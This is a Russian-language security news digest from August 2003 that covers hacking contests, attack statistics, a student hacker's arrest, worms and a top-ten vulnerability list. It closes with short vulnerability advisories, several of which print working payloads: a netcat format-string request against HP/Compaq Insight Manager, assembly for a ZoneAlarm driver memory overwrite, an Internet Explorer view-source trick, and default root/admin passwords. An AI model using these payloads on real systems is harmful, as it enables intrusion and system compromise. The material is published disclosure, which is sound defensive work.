Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru


Информационная безопасность на Стра.тег.ру за 2003/8/6 00:10 - 2003/8/7 00:26


Бесплатный доступ к web-сайту "Лаборатории Касперского" - реальность для любого пользователя сети

6 августа | Рубрика: Технологии безопасности. Организации разработчики, интеграторы. антивирус Касперский

Участие компании в проекте WWW Open обеспечит любого пользователя Рунета свободным доступом к web-сайту "Лаборатории Касперского"

Программа WWW Open - это совместный проект ЗАО "Открытые Коммуникации" совместно с ОАО "Центральный телеграф", представленный летом 2003 года. В рамках проекта всем пользователям интернет круглосуточно предоставляется бесплатный канал доступа к популярным ресурсам сети по коммутируемым линиям связи (dial-up). Этот сервис ориентирован на активных пользователей, заинтересованных в неограниченном оперативном доступе к торговым и информационно-справочным сайтам в интернете.

Учитывая популярность Антивируса Касперского, а также огромное число ежедневных обращений к web-сайту компании, "Лаборатория Касперского" стала одним из первых участников WWW Open. Участие компании в данном проекте дает широкий ряд возможностей любому пользователю, нуждающемуся в оперативной защите своего компьютера от вредоносных программ, но не располагающему возможностью оплаты услуг провайдера интернет-доступа.

При помощи бесплатного коммутируемого соединения в любой момент времени можно загрузить последнее обновление антивирусной базы данных Антивируса Касперского, демо-версии антивирусных продуктов "Лаборатории Касперского" или обратиться по электронной почте в круглосуточную службу технической поддержки компании. Все, что нужно для этого пользователю - корректно настроить модемное соединение.

Ознакомиться с детальной информацией о проекте WWW Open, перечнем компаний-участников проекта, а также установить параметры коммутируемого соединения компьютера можно по адресу http://list.openwww.ru.

0

Хакерский конкурс поможет кибербезопасности

6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны хакер вирус Технологии безопасности. Организации разработчики, интеграторы.

Боевая подготовка является частью игры известной, как Root Fu. Ежегодные соревнования проходят в рамках конференции DefCon. Восемь команд проходят проверку на способность обороняться от кибератак и хакерский талант. Каждая группа должна защитить собственный сервер и приложения, в то же время попытаться взломать серверы других участников.

«Подобный вид состязаний ясно показывает недостатки и достоинства в сфере компьютерной безопасности», - объясняет Криспин Кауэн, руководитель исследовательских работ компании Immunix. – «Мы дорожим данными соревнованиями потому, как они более объективно оценивают безопасность, нежели какие-либо общие критерии».

Безусловно, такие комментарии вступают в чрезвычайный конфликт с мнением представителей верховной власти США. Чиновники по-прежнему рассматривают хакеров, как угрозу.

Законы - Digital Millennium Copyright Act и Cybersecurity Enhancement Act – облагают взломщиков жесткими взысканиями и наказаниями. Однако мудрые эксперты рассматривают соревнования Root Fu, как важный и необходимый способ улучшения безопасности.

Каждая команда руководит 5 веб-сервисами. Среди них, музыкальное приложение, новостной портал, 2 рекламных и многопользовательская ролевая игра FurryMuck.. Очки присваиваются за доступность приложений. Чем дольше продержится сервис, тем больше баллов и шансов у команды на победу.

Инженер по безопасности Алан Харпер из Агентства по защите информационных систем считает, что состязания, как Root Fu, помогают другим понять, что не все хакерство плохое. «Это понимание кроется в этике взломщиков. Техника может быть одинакова, но намерения разными. Это не то, что мы должны скрывать».

Root Fu возможно вновь всколыхнет длительные дебаты о том, могут ли хакеры быть лучшими защитниками. «Агрессивные вторжения проводят хорошую ревизию программ. Они атакуют, находят дыры и сообщают о них защитникам команды», - отмечает г-н Кауэн.

Как свидетельствует BusinessWeek Online , опыт показывает, что знания о том, как атаковать системы являются решающими в совершенствовании защиты.

Хотя многие полагают, что взломщикам верить нельзя, Криспин Кауэн подчеркивает, что все зависит от этики. «Орудия хакеров должны быть легальными. Однако если я использую их для взлома вашего компьютера, тогда я могу считаться преступником».

1

Хакеры США и Китая не знают предела

6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны хакер вирус

В первой половине текущего года компания e-Cop, предоставляющая услуги безопасности, провела очередное исследование в сфере интернет-преступлений в Азиатско-Тихоокеанском регионе. В первой половине текущего года количество хакерских атак в регионе составило 76 миллионов случаев, что на 77% больше, чем за аналогичный период в прошлом году (43 млн. атак). Для сравнения, за весь предыдущий год было зафиксировано 101 млн. случаев кибератак. Собираемая компанией статистика показывает, что, начиная с 2001 года, число хакерских атак в регионе возрастает на 8% каждый месяц.

Иностранные аналитики даже не берутся подсчитать в денежном эквиваленте потери, вызванные всеми атаками. Наташа Дэвид, старший аналитик компании International Data, заявляет, что произвести оценку ущерба практически невозможно. Основной причиной является сложность оценки ущерба от потери конфиденциальной информации и простоя корпоративных информационных систем.

Наиболее активными в Азиатско-Тихоокеанском регионе были хакеры из Северной Азии, к которым относятся Китай, Гонконг и Тайвань. На их долю в первом квартале 2003 года пришлось 26% атак. Сразу за ними с минимальным отрывом идут взломщики из США, доля которых в количестве атак составляет 25%. Следует отметить, что активность хакеров, осуществляющих атаки с территории США, растет из года в год: если в 2001 году на их долю приходилось 19% атак, в 2002 году — уже 21%.

Сингапур является региональным лидером (Юго-Восточной Азии) в активности сетевых взломщиков. По количеству хакерских атак Сингапур следует сразу после своих «конкурентов» из Северной Азии и США. Статистика свидетельствует о том, что за прошедшую часть текущего года хакеры из Сингапура были ответственны за 9% предпринятых атак.

Хакеры, как правило, оснащены по последнему слову техники. Многие из них превосходно разбираются в психологии, что позволяет им заниматься социальным инжинирингом. Суть этого метода в том, что хакер с помощью телефонных или иных переговоров может получить ценную информацию от ничего не подозревающих сотрудников компании. Впоследствии полученная информация используется для того, чтобы проникнуть на компьютеры атакуемой компании.

Многие специалисты из Азиатско-Тихоокеанского региона переживают, что преступность в интернете неуклонно растет из года в год и в скором времени регион может догнать по количеству виртуальных атак США и Европу.

Помимо Сингапура, активность проявляют хакеры из Кореи — 9%. Следом за Кореей идут Япония (6%) и Малайзия (3%). Корея попадает в пятерку стран, начиная с марта 2003 г. В прошлом году эта страна ни разу не попадала в список стран-лидеров по количеству осуществляемых с ее территории атак, поэтому специалисты с тревогой относятся к тому, что активность хакеров растет практически во всех странах региона.

2

В США арестован серийный хакер

6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны хакер

24-летнему аспиранту Университета Мичигана (University of Michigan) удалось с помощью чужих паролей проникнуть в университетскую компьютерную сеть и добыть там задания и ответы для заключительного экзамена – и это лишь одно из преступлений, в которых он обвиняется. На совести молодого хакера, которого пресса сразу же окрестила «серийным», – кража номеров кредитных карт и рассылка сообщений электронной почты от имени других адресатов.

Нин Ма (Ning Ma), 24-летний аспирант из Китая, находится в США по студенческой визе. В Университете Мичигана он изучает финансовый инжиниринг. На прошлой неделе Нин Ма был арестован по обвинению в 23 киберпреступлениях, жертвами которых стали 60 человек. После предъявления обвинения суд назначил залог за освобождение в размере $100 тыс.

С августа 2002 года по апрель этого года Нин Ма получал доступ к чужой электронной почте и личным файлам других пользователей университетской сети, утверждает обвинение. Логины и пароли преподавателей и студентов он узнавал, используя специальную программу, которая фиксирует каждое нажатие клавиши другими пользователями.

Как заявило обвинение, Нин Ма отправил с адреса одного из преподавателей письмо студентке, в котором говорилось, что она очень отстает по его предмету, и предлагалось репетиторство в обмен на услуги интимного характера. Китайский аспирант отменил также визит одного из студентов на собеседование для приема на работу и узнал номер кредитной карты, банковского счета и пин-код другого студента. Кроме того, в университетской сети он проник в личные хранилища данных двух преподавателей, где и находились экзаменационные задания и ответы к ним.

В целом Нин Ма обвиняют в 16 случаях неавторизованного доступа к компьютеру, компьютерной системе или сети, 4 случаях перехвата информации, а также в незаконном владении устройством для извлечения информации и использовании компьютера для совершения преступления. Если китайского аспиранта признают виновным, ему грозит до 5 лет лишения свободы.

3

Windows официально признали небезопасной

6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны дыра уязвимость

Долгие споры вокруг использования Windows-систем воплотились в официальный вердикт американских властей: продукт от Microsoft небезопасен.

Такое заключение сделали на днях представители Департамента внутренней безопасности при правительстве США. Поводом к такому резонансному заявлению стал факт недавней атаки на несколько сетей, пребывающих в государственном подчинении.

Все они работали под Windows и не сумели устоять под давлением RPC-атаки. И хотя на сегодня атака уже локализована, Департамент не исключает возможности дальнейшего ее распространения, сообщает CNN.

4

Атака на Беркли

6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны дыра вирусная атака

После обнародования информации об уязвимости в реализации RPC в Windows, первые цветочки не заставили себя долго ждать. По оценке администрации сети университета Беркли, уже от 50 до 100 машин в кампусе были успешно атакованы с ее помощью. Учтя тот факт, что из 40 тысяч машин, входящих в сеть, примерно половина использует Windows (хотя, конечно весьма сомнительно что бы NT-системы составляют там большинство), пропатчено минимальное количество, и снаружи приходит до тысячи попыток сканирования ежедневно, администрация приняла радикальное решение - отрезать всю сеть от внешнего мира на четыре дня и провести за это время глобальную чистку. (Источник: www.bugtraq.ru) 5


Klexe - почтовый вирус и троян в одном флаконе

6 августа | Рубрика: Проблемные ситуации, информационная преступность, сетевые войны вирус вирусная атака

Компания Panda Software предупреждает о появлении нового многофункционального червя Klexe. Он состоит из двух компонентов: первый обеспечивает его распространение по электронной почте, а второй выполняет функции трояна, похищая данные с пораженного компьютера. компьютере жертвы трояна, который похищает конфиденциальную информацию пользователя и отправляет ее на специальный адрес электронной почты. Процесс заражения происходит следующим образом: на электронный почтовый ящик пользователя приходит письмо со ссылкой на веб-страницу, где ему предлагается скачать карту e-Messenger; после открытия данной страницы на компьютер пользователя загружаются два файла с различными компонентами червя. При попадании червя на компьютер пользователя, он обеспечивает свой автозапуск, затем на экране появляется сообщение об ошибке, после чего Klexe рассылает копию зараженного письма по всем адресам, найденным в адресной книге Outlook. 6


Англичане не прочь превратиться в нацию киберищеек

6 августа | Рубрика: Информационая безопасность общественной коммуникации, личности.

Согласно опросу, спонсируемому Symantec, четверь британских мужчин и 13% женщин с удовольствием бы покопались в компьютере своих боссов на предмет определения размера зарплаты своих сослуживцев. Примерно таково же число желающих ознакомиться с корпоративными планами и финансовой информации.

Ну а когда дело доходит до родных и близких, все становится еще веселее - 40 процентов женщин готовы читать электронную почту своего благоверного, а оставшиеся 60 были бы готовы просматривать сообщения при возникновении подозрений в неверности. У мужчин соответствующие значения - четверть и треть, а 35 процентов готовы делать это в случае уверенности, что их не застукают.

7

В Сети появился живой хит-парад самых страшных «дыр»

6 августа | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны дыра уязвимость

Компания Qualys, занимающаяся вопросами безопасности в интернете, опубликовала список самых незащищенных звеньев Сети, которыми чаще всего пользуются хакеры для совершения своих атак. Список динамический – он создается в режиме реального времени при помощи сканирования огромного количества участков Сети.

Компьютерные вандалы используют бреши в программах, чтобы заполучить контроль над машинами и затем использовать их для запуска в интернет вирусов и червей. В последние годы эта проблема превратилась в головную боль специалистов по защите сетей. Создатели списка пытаются вычислить, каким «дырам» хакеры уделяют больше всего внимания в данный момент.

Рейтинг уязвимостей обновляется ежедневно, каждую неделю база данных Qualys пополняется 25 новыми «дырами». В создании списка проблем и путей их решения принимают участие такие организации, как Incidents.org, команда срочных компьютерных вызовов Cert, а также Bugtraq.

Рейтинг самых опасных дыр - The RV10 на 6 августа выглядит следующим образом:
Title CVE ID Qualys ID
Microsoft IIS CGI Filename Decode Error Vulnerability CVE-2001-0333 86140
Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability CVE-2001-0500 86170
Microsoft IIS Malformed HTR Request Buffer Overflow Vulnerability CVE-2002-0071 10577
Apache Chunked-Encoding Memory Corruption Vulnerability CVE-2002-0392 86352
ISC BIND SIG Cached Resource Record Buffer Overflow (sigrec bug) Vulnerability CAN-2002-1219 15030
Microsoft Windows 2000 IIS WebDAV Buffer Overflow Vulnerability CAN-2003-0109 86479
Sendmail Address Prescan Possible Memory Corruption Vulnerability CAN-2003-0161 74136
Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability CAN-2003-0352 68518
SSL Server Has SSLv2 Enabled Vulnerability No CVE assigned 38139
Writeable SNMP Information No CVE assigned 78031

8

Wi-Fi: один пользователь может замедлить работу всего "хот-спота"

6 августа | Рубрика: Дыры и патчи программ и операционных сред Проблемные ситуации, информационная преступность, сетевые войны дыра

Группа французских ученых сообщила на днях об обнаружении уязвимости в технологии беспроводных локальных сетей, позволяющей одному пользователю с невысокой скоростью доступа к сети снижать скорость подключения всех остальных пользователей "хот-спота". Четверо специалистов из Centre Nationale de la Recherche Scientifique (CNRS) в Париже собщили в своем докладе, что отклонения в стандарте IEEE 802.1x, включающем спецификации 802.11a, 802.11g и 802.11b, могут привести к ухудшению пропускной способности "хот-спота".

Специалисты приводят пример, когда несколько пользователей со скоростью подключения 11 Мб/сек благодаря близости от точки подключения замечают, что этот показатель начинает резко падать после подключения единственного далеко расположенного пользователя. Недостаток проявляется в протоколе доступа CSMA/CA (Carrier Sense Multiple Access/Avoidance Collision), который должен обеспечивать равноценный доступ к точке подключения для всех устройств.

Несмотря на значительно падение скорости, недостаток может не быть замечен пользователями, особенно при нересурсоемких поцедурах вроде просмотра веб-страниц. Однако достаточно лишь одному из пользователей начать загрузку файла или осуществление доступа к аудио или видео через беспроводное подключение, как проблема даст о себе знать.

9

Изменение представления форума в Invision Power Board

6 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость в проверке правильности ввода обнаружена в Invision Power Board. Удаленный авторизованный пользователь может послать сообщение, которое изменит вид форума и потенциально изменит URL ссылки в форуме.

Программное обеспечение должным образом не обрабатывает перекрывающиеся IBF тэги (например '[QUOTE]', '[IMG]'). В результате удаленный авторизованный пользователь может перекрыть QUOTE тэг с IMG тэгом таким образом, чтобы закрыть нераскрытую кавычку. В результате удаленный авторизованный пользователь может изменить представление форума. Пример:

[IMG]http://[target]/some.gif[QUOTE]some.gif[/IMG][/QUOTE]

10

Удаленное выполнение произвольного кода в HP/Compaq Insight Manager

6 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость обнаружена в HP/Compaq Insight Manager. Удаленный пользователь может выполнить произвольный код на системе.

Уязвимость форматной строки обнаружена в DebugSearchPaths HTTP запросе. Удаленный атакующий может выполнить произвольный код с LocalSystem привилегиями. Пример:

$ printf "GET /<\x21.DebugSearchPaths>?Url=perl -e 'print "A"x14'BBBBperl -e 'print ".%%x"x1208'%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301

Уязвимость обнаружена в Compaq Insight Manager 5.00 H

Способов устранения обнаруженной уязвимости не существует в настоящее время.

11

Уязвимость в view-source: протоколе в Microsoft Internet Explorer

6 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость обнаружена при в Microsoft Internet Explorer при открытии pop up окон с помощью notepad. Злонамеренная Web страница или email или может отобразить pop up окно независимо от настроек безопасности и открыть произвольный файл на целевой системе пользователя, чтобы нарушить стабильность работы системы.

Pop up окно отображается в IE используя "view-source:"протокол. Протокол берет в качестве параметра URL сайта и отображает в исходный HTML код URL в утилите Notepad. Например, чтобы просмотреть исходный HTML код SecurityLab.ru, кликните на следующую ссылку:

www.SecurityLab.ru

view-source протокол также работает с файлами на локальном жестком диске. Например следующий URL отобразит boot.ini файл в c:\ каталоге.

view-source:file:///c:\boot.ini

В internet Explorer, view-source может использоваться в практически любом HTML тэге, который работает с URL. Например, следующий тэг [IMG] автоматически откроет Notepad окно в HTML email сообщении или в Web странице:

<img src=view-source:http://www.computerbytesman.com/security/npexample.txt>
В результате возможны следующие побочные эффекты view-source метода, разрешенного во всех HTML тэгах:
  1. Notepad окно будет открыто автоматически в HTML почтовом сообщении, даже если отключено использование сценариев.
  2. Большинство программ блокирования popup окон не в состоянии заблокировать notepad окна.
  3. Простое почтовое HTML сообщение или Web-страница могут легко открыть тысячи окон, что может повлиять на стабильность работы системы. Например, единственный тэг [IMG] может открыть для редактирования в notepad системный файл c:\windows\system32\shell32.dll, используя 20 Мб системной памяти. 100 [IMG] тэгов будут потреблять 2 Gb виртуальной памяти
  4. Работа Windows системы может нарушиться, если пользователь случайно изменяет содержание системного файла в notepad окне и затем записывает его.
Уязвимость обнаружена в Microsoft Internet Explorer 5.0-6.0

Способов устранения обнаруженной уязвимости не существует в настоящее время.

12

Выполнение произвольного кода в ZoneAlarm

6 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость обнаружена в драйвере устройства в ZoneAlarm. Атакующий может получить полный контроль над уязвимой системой.

Посылая специально обработанное форматированное сообщение к ZoneAlarm Device Driver (VSDATANT - TrueVector Device Driver), атакующий может перезаписать часть памяти драйвера устройства. В результате атакующий может выполнить произвольный код на системе:

Первый сигнал должен быть послан, чтобы перезаписать определенный участок памяти, в нашем случае, этом может быть один из операторов условного перехода:

    
push 0                                     ;overlapped 
     push offset bytes_returned                 ;bytes returned 
     push 4                                     ;lpOutBuffer size 
     push STATMENT_INSTRUCTION_POINTER          ;memory to overwrite 
     push 0                                     ;lpInBuffer size 
     push 0                                     ;lpInBuffer 
     push 8400000fh                             ;guess what X-D 
     push vsdatant_handle                       ;device handle 
     call DeviceIoControl                       ;send it! 
Правильный STATMENT_INSTRUCTION_POINTER должен перезаписать адрес к 00060001h (например). После распределения памяти в этом адресе (вставка shellcode bla bla bla), второй сигнал должен быть послан, чтобы внедриться во вставленный код. Это может быть сделано посылкой другого сигнала:
    LpInBuffer: 
     db STATMENT_OVERWRITTEN_NUMBER                     ;where to jump 
     db 7 dup (0)                                       ;data? 
     dd temp_buff                                       ;temp buffer 
     db 10 dup (0)                                      ;some space 
После посылки второго фальшивого сообщения, драйвер устройства перейдет к STATEMENT оффсету, который был перезаписан первым "сигналом". В результате атакующий может получить выполнить произвольный код с SYSTEM привилегиями.

Уязвимость обнаружена в Local ZoneAlarm Firewall все версии (проверено на 3.1)

Способов устранения обнаруженной уязвимости не существует в настоящее время.

13

Уязвимость состояния операции в функции psig() в Sun Solaris

6 августа | Рубрика: Дыры и патчи программ и операционных сред

Отказ в обслуживании обнаружен в Sun Solaris. Локальный пользователь может аварийно завершить работу системы.

Уязвимость состояния операции обнаружена в функции psig(). Локальный пользователь может установить переменную lwp_cursig к нулю и proc.p_sig к ненулевому значению, чтобы нарушить работу систмемы.

В уязвимых системах, файлы регистрации содержат запись "BAD TRAP: type=31".

Уязвимость обнаружена в Solaris 2.6, 7, 8, and 9

Информацию о заплатах см. в источнике сообщения.

14

Отказ в обслуживании в NAT в Netfilter

6 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость обнаружена в NAT выполнении в Netfilter. Удаленный пользователь может аварийно завершить работу целевой системы.

Удаленный пользователь может послать FTP и IRC пакеты, чтобы аварийно завершить работу системы.

Уязвимость может эксплуатироваться, если ядро конфигурировано с CONFIG_IP_NF_NAT_FTP или CONFIG_IP_NF_NAT_IRC параметрами или если ip_nat_ftp or ip_nat_irc модули загружены и FTP и IRC службы не фильтруются.

Уязвимость обнаружена в Linux 2.4.20 – 2.5.x

15

Учетная запись по умолчанию в Enceladus Server Suite

6 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость в конфигурации по умолчанию обнаружена в Enceladus Server Suite. Пользователь по умолчанию доступен удаленному пользователю.

Система по умолчанию создает привилегированную учетную запись с именем “root” и паролем “root”.

Уязвимость обнаружена в Enceladus Server Suite 3.9

Способов устранения обнаруженной уязвимости не существует в настоящее время.

16

Ракрытие пароля локальному пользователю в bjServer

6 августа | Рубрика: Дыры и патчи программ и операционных сред

Уязвимость раскрытия пароля обнаружена в bjServer ( BajieServer ). Локальный пользователь может просмотреть пароль администратора.

Программа хранит пароли администратора в открытом виде в 'config/users.properties' файле.

Также сообщается, что имя пользователя/пароль по умолчанию – admin/admin.

Способов устранения обнаруженной уязвимости не существует в настоящее время.

17




Эти и другие новости читайте на сайте Стра.тег



http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное